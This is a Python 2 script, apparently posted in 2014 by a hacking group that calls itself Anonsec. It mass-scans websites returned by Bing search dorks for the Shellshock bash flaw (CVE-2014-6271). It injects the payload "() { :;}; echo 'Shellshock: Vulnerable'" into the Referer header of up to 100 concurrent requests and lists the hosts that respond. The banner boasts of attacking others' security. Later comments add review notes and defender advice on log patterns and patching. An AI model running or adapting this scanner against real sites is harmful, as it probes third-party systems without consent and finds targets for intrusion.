[+] ShellShock-Scout.py [+]

_d3f4ult Oct 6th, 2014 (edited) 2,172 Never
  1. #!/usr/bin/env python
  2. # We are...
  3. #                     _____                         _________              
  4. #                    /  _  \   ____   ____   ____  /   _____/ ____   ____  
  5. #                   /  /_\  \ /    \ /  _ \ /    \ \_____  \_/ __ \_/ ___\
  6. #                  /    |    \   |  (  <_> )   |  \/        \  ___/\  \___
  7. #                  \____|__  /___|  /\____/|___|  /_______  /\___  >\___  >
  8. #                          \/     \/            \/        \/     \/     \/
  9. #                                   //Laughing at your security since 2012*
  10. # ================================================================================================
  11. # Official Members: Mrlele - AnonSec666 - 3r3b0s - d3f4ult - 4prili666h05t - Hannaichi - ap3x h4x0r
  12. #                         - Gh05tFr3ak - xCyb3r 3vil7 -  Hassouna Khalil - spider64
  13. # ================================================================================================
  14. #
  15. #
  16. # We are Anonsec
  17. # Beware of our Cyber-Mafia
  18. # We do not Forgive
  19. # We do not Forget
  20. # Expect Us
  21. #
# Startup banner. These Python 2 print statements sit at module top level,
# ahead of the imports, so they run unconditionally whenever the file is loaded.
# The banner names the issue the script tests for: CVE-2014-6271.
print "###########################################################"
print "###                ShellShock_Scout.py                  ###"
print "###          Mass Bing ShellShock Dork Scanner          ###"
print "###                   CVE-2014-6271                     ###"
print "### *************************************************** ###"
print "###                   \!/Anonsec\!/                     ###"
print "###        Laughing at your security since 2012*        ###"
print "###                                                     ###"
print "###                    _.-''|''-._                      ###"
print "###                 .-'     |     `-.                   ###"
print "###               .'\      |       /`.                 ###"
print "###             .'   \     |      /   `.               ###"
print "###             \    \    |     /     /               ###"
print "###              `\   \   |    /    /'                ###"
print "###                `\  \  |   /   /'                  ###"
print "###                  `\ \ |  /  /'                    ###"
print "###                 _.-`\ \ | / /'-._                   ###"
print "###    ~~(8:>      {_____`\\|//'______}  ~~(8:>          ###"
print "###                        `-'                          ###"
print "### twitter.com/_d3f4ult                                ###"
print "###########################################################"
# monkey.patch_all() is called before urllib2 and socket are imported; gevent
# documents this ordering so that the blocking standard-library calls used
# below yield to other greenlets instead of stalling the whole process.
from gevent import monkey
monkey.patch_all()
from gevent.pool import Pool
from gevent import joinall
import urllib
import urllib2
import argparse
import sys
import json
import socket
# Process-wide default: a socket created without its own timeout gives up after 60 s.
socket.setdefaulttimeout(60)
# Module-level flag. action() sets it to True on a positive response and
# main() reads it to decide whether to print the "none found" message.
VULN_FOUND = None
def parse_args():
        """Parse the command line and return the argparse namespace.

        Options:
          -s/--search  search terms
          -p/--pages   number of 50-result pages to fetch; stored as a string,
                       default "1"
          -k/--key     Bing API key

        NOTE(review): the key arrives on the command line, so it is visible in
        the process list and shell history of the machine running the script.
        """
        options = (
                (("-s", "--search"), {"help": "Search terms"}),
                (("-p", "--pages"), {"default": "1", "help": "Number of pages of results to fetch where there's 50 results per page; defaults to 1"}),
                (("-k", "--key"), {"help": "Your Bing API key found at https://datamarket.azure.com/account"}),
        )
        cli = argparse.ArgumentParser()
        for flags, settings in options:
                cli.add_argument(*flags, **settings)
        return cli.parse_args()
def bing_search(query, key, offset, **kwargs):
        """Fetch one page of Bing Search API results and return the raw body.

        query  -- search terms; URL-quoted here before being placed in the URL.
        key    -- Bing API key, registered as the HTTP Basic password with an
                  empty username.
        offset -- value for the $skip parameter; must already be a string
                  because it is concatenated into the URL.
        kwargs -- accepted but never read.

        Returns the response body exactly as read from urlopen(); the caller
        parses it as JSON. Any exception raised while fetching ends the whole
        process through sys.exit().
        """
        username = ''
        baseURL = 'https://api.datamarket.azure.com/Bing/Search/'
        query = urllib.quote(query)
        # NOTE(review): user_agent, credentials and auth are computed but never
        # attached to a request; authentication is left to the password manager below.
        user_agent = 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)'
        credentials = (':%s' % key).encode('base64')[:-1]
        auth = 'Basic %s' % credentials
        url = baseURL+'Web?Query=%27'+query+'%27&$top=50&$format=json&$skip='+offset
        # The printed URL contains the query and offset only; the key is not part of it.
        print '[*] Scanning -> '+url
        password_mgr = urllib2.HTTPPasswordMgrWithDefaultRealm()
        # The credentials are registered for this exact URL.
        password_mgr.add_password(None, url, username, key)
        handler = urllib2.HTTPBasicAuthHandler(password_mgr)
        opener = urllib2.build_opener(handler)
        # install_opener() replaces the process-wide default opener, so every
        # later urllib2.urlopen() call in this script goes through this handler chain.
        urllib2.install_opener(opener)
        try:
                readURL = urllib2.urlopen(url, timeout=60).read()
        except Exception as e:
                # Broad catch: any failure (network, HTTP status, auth) ends the run.
                sys.exit('[-] Failed to fetch bing results. Are you sure you have the right API key?\n Error: '+str(e))
        return readURL
def action(result):
        """Probe one search result for CVE-2014-6271 and report a positive response.

        result -- one entry of the Bing results list; only result['Url'] is read.

        Sends a single GET to that URL with a Shellshock test string in the
        Referer header, then checks whether the response carries a header named
        "shellshock". On a match it sets the module-level VULN_FOUND flag and
        prints the URL. Returns None in every case.

        Defender notes: this probe shows up in access logs as a Referer value
        beginning with "() {". No legitimate browser sends a header starting
        with that sequence, so it can be alerted on or rejected at a proxy/WAF
        for any request header. Blocking the pattern only hides the symptom;
        the durable fix is a bash build patched for CVE-2014-6271 on every
        host that passes request headers to a shell (CGI and similar).
        """
        global VULN_FOUND
        # Test string: a bash function definition followed by an echo command.
        # The check further down presumably relies on the echoed line surfacing
        # as a response header when an unpatched bash sits behind the URL.
        exploit = "() { :;}; echo 'Shellshock: Vulnerable'"
        # Ordinary browser User-Agent; only the Referer carries the test string.
        ua = 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0'
        url = result['Url']
        req = urllib2.Request(url)
        req.add_header('User-Agent', ua)
        req.add_header('Referer', exploit)
        try:
                r = urllib2.urlopen(req, timeout=60)
        except Exception as e:
                # Every failure (timeout, DNS, HTTP error status) is silently
                # treated as "no finding"; nothing is logged.
                return
        # NOTE(review): resp_headers is assigned but never used; the test below
        # calls r.info() a second time.
        resp_headers = r.info()
        # Membership test on the header object, i.e. on header names rather than
        # the body. NOTE(review): presumably case-insensitive in the Python 2
        # message class -- confirm.
        if 'shellshock' in r.info():
                VULN_FOUND = True
                print '[!] SHELLSHOCK VULNERABLE:', url
        return
def result_concurrency(results):
        """Run action() on every result through a gevent pool and wait for all of them.

        results -- iterable of result entries, each handed to action() unchanged.

        The pool size is fixed at 100. Returns whatever joinall() returns for
        the spawned greenlets.
        """
        max_in_flight = 100
        workers = Pool(max_in_flight)
        greenlets = []
        for entry in results:
                greenlets.append(workers.spawn(action, entry))
        return joinall(greenlets)
def main():
        """Entry point: validate the CLI, collect result pages, probe each result.

        Exits through sys.exit() when the search term or key is missing, or
        when the key is not 43 or 44 characters long. Result pages are fetched
        one after another until the requested page count is reached or a page
        comes back empty; the collected entries are then passed to
        result_concurrency().
        """
        args = parse_args()
        if not args.search:
                sys.exit('[!] Specify a search term, eg, ./shellshock_scout.py -s "dorks"')
        if not args.key:
                sys.exit('[!] Specify a Bing API key or get one here: https://datamarket.azure.com/dataset/bing/search')
        api_key = args.key
        if len(api_key) != 44 and len(api_key) != 43:
                sys.exit('[-] Incorrect key length')
        search_terms = args.search
        page_count = int(args.pages)
        collected = []
        for page_index in xrange(page_count):
                # 50 results per page, so page N starts at offset 50 * N.
                skip = 50 * page_index
                raw_body = bing_search(search_terms, api_key, str(skip))
                page_results = json.loads(raw_body)['d']['results']
                if len(page_results) == 0:
                        print '[-] No more results found'
                        break
                collected += page_results
        print '[*] Checking each search result...'
        result_concurrency(collected)
        # VULN_FOUND stays None unless action() saw a positive response.
        if not VULN_FOUND:
                print '[-] No vulnerable sites found'
# Start the scan only when the file is executed as a script. The banner at
# the top of the file is printed on import as well, since it is not guarded.
if __name__ == "__main__":
        main()